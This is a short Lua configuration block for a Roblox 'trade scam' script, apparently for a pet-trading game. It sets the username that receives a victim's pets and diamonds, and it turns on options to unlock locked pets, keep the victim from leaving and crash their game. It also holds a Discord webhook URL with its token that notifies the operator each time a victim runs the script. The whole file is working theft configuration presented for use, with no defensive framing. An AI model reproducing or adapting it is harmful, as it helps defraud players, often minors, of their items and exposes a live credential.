_G.Username = "tedaka2345t" --// Username To Send Pets To
_G.GiftMessage = "lol" --// Message For The Gift To Say
_G.Diamonds = 5000000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true --// Crashes Them After Its Finished
--[[ Webhook Config ]]--
_G.Enabled = true --// Toggle For Sending Webhooks
_G.Mention = true --// Pings You When Someone Executes
_G.Webhook = "https://discordapp.com/api/webhooks/1097938216482525314/tzA0hmS3JQpa586JfvZLAn6G624-i3vHrfI7KvPXuAlLX46dtcBZCTH_MvM95RZ-tXgh" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "trade scam" --// Script Name On The UI
_G.Tip1 = "no" --// Gives You Tips On The UI
_G.Tip2 = "yes" --// Gives You Tips On The UI
_G.Tip3 = "1" --// Gives You Tips On The UI
_G.Tip4 = "2" --// Gives You Tips On The UI
_G.Tip5 = "3" --// Gives You Tips On The UI
